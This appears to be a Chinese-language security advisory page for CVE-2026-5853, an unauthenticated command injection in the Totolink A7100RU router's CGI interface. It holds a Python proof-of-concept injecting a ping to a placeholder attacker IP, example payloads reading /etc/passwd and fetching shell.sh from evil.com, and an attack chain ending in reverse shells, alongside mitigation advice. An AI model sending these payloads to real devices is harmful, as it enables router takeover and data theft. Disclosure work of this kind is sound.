IPBUF安全漏洞报告
English
CVE-2026-5853 CVSS 9.8 严重

CVE-2026-5853 Totolink路由器远程命令执行漏洞

披露日期: 2026-04-09

漏洞信息

漏洞编号
CVE-2026-5853
漏洞类型
命令注入
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Totolink A7100RU

相关标签

RCE命令注入IoTTotolink路由器

漏洞概述

Totolink A7100RU路由器在固件版本7.4cu.2313_b20191024中存在严重的远程命令执行漏洞。该漏洞源于/cgi-bin/cstecgi.cgi文件中的setIpv6LanCfg函数未对传入的addrPrefixLen参数进行有效过滤。攻击者无需用户交互及身份认证,即可通过网络向目标设备发送特制数据包,触发操作系统命令注入。成功利用此漏洞可导致攻击者完全接管设备权限,获取敏感信息或中断网络服务,风险等级极高。

技术细节

该漏洞的核心在于Totolink A7100RU路由器Web接口对用户输入的校验缺失。具体而言,CGI处理程序在处理setIpv6LanCfg请求时,直接将用户提交的addrPrefixLen参数拼接到系统命令中执行。由于缺乏对特殊字符(如分号、管道符等)的转义处理,攻击者可以构造恶意的Payload。利用过程通常涉及向/cgi-bin/cstecgi.cgi端点发送POST请求,并在JSON数据体中注入形如'; cat /etc/passwd'或'; wget http://evil.com/shell.sh'的命令。由于该服务通常以root权限运行,注入的命令将继承高权限执行。这使得攻击者能够读取设备配置、植入后门甚至破坏固件。结合CVSS向量(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H),该漏洞具有极高的可利用性和破坏力,属于典型的IoT设备远程代码执行(RCE)风险。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别出运行固件版本7.4cu.2313_b20191024的Totolink A7100RU设备。
STEP 2
漏洞利用
攻击者向目标设备的/cgi-bin/cstecgi.cgi接口发送特制的POST请求,在setIpv6LanCfg函数的addrPrefixLen参数中注入恶意的Shell命令。
STEP 3
命令执行
由于后端未过滤特殊字符,设备将恶意参数拼接到系统命令中并以root权限执行,从而运行攻击者指定的代码。
STEP 4
建立控制
攻击者利用执行权限下载恶意程序、开启反弹Shell或修改防火墙规则,从而完全控制路由器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # Target URL url = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi" # Headers headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (compatible; PoC/1.0)" } # Payload data # The vulnerability is in 'addrPrefixLen' parameter within 'setIpv6LanCfg' function # Injecting a simple ping command to verify command execution (blind RCE) data = { "topicurl": "setIpv6LanCfg", "addrs": "::", "addrPrefixLen": "64; ping <ATTACKER_IP>; #", # Injection point "addrType": "static" } try: response = requests.post(url, data=json.dumps(data), headers=headers, timeout=5) print(f"Status Code: {response.status_code}") print("Response:") print(response.text) except Exception as e: print(f"Error: {e}")

影响范围

Totolink A7100RU 7.4cu.2313_b20191024

防御指南

临时缓解措施
建议用户立即检查设备固件版本,如果确认受影响,请尽快将设备断网并升级至官方修复版本。在无法立即升级的情况下,应严格限制对路由器Web管理界面的访问来源IP,并关闭远程管理功能,以降低被自动化攻击脚本利用的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表